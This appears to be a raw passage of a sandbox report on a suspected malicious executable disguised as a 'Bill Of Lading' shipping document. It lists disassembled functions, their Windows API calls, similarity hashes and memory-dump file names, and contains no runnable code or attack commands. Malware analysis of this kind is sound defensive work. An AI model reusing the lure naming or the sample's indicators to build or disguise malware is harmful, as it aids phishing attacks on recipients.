• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
• Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
• LineTo.GDI32(?,00000000,00000002), ref: 004472A0
• EndPath.GDI32(?), ref: 004472B0
• StrokePath.GDI32(?), ref: 004472BE
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
• Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
APIs
• __getptd.LIBCMT ref: 00417D1A
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __getptd.LIBCMT ref: 00417D31
• __amsg_exit.LIBCMT ref: 00417D3F
• __lock.LIBCMT ref: 00417D4F
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
• Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
APIs
• GetDesktopWindow.USER32 ref: 00471144
• GetDC.USER32(00000000), ref: 0047114D
• GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
• ReleaseDC.USER32(00000000,?), ref: 0047117B
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
• Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
APIs
• GetDesktopWindow.USER32 ref: 00471102
• GetDC.USER32(00000000), ref: 0047110B
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
• ReleaseDC.USER32(00000000,?), ref: 00471139
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
• Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
APIs
• SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
• GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
• GetCurrentThreadId.KERNEL32 ref: 004389DA
• AttachThreadInput.USER32(00000000), ref: 004389E1
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
• Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
• Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00414080
• __freeptd.LIBCMT ref: 0041408A
• ExitThread.KERNEL32 ref: 00414093
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3182216644-0
• Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
• Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower
                                                                                                                      • String ID: $8'I
                                                                                                                      • API String ID: 2358735015-3608026889
                                                                                                                      • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                      • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                      • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                      • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                      • API String ID: 3380330463-3941886329
                                                                                                                      • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                      • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                      • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                      • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00409A61
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: 0vH
                                                                                                                      • API String ID: 1143807570-3662162768
                                                                                                                      • Opcode ID: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                                                                                                      • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                      • Opcode Fuzzy Hash: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                                                                                                      • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HH$HH
                                                                                                                      • API String ID: 0-1787419579
                                                                                                                      • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                      • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                      • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                      • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                                                                                                      • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                      • Opcode Fuzzy Hash: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                                                                                                      • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                      • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                      • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                      • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                      • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                      • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                      • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
• Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
• Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
• Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
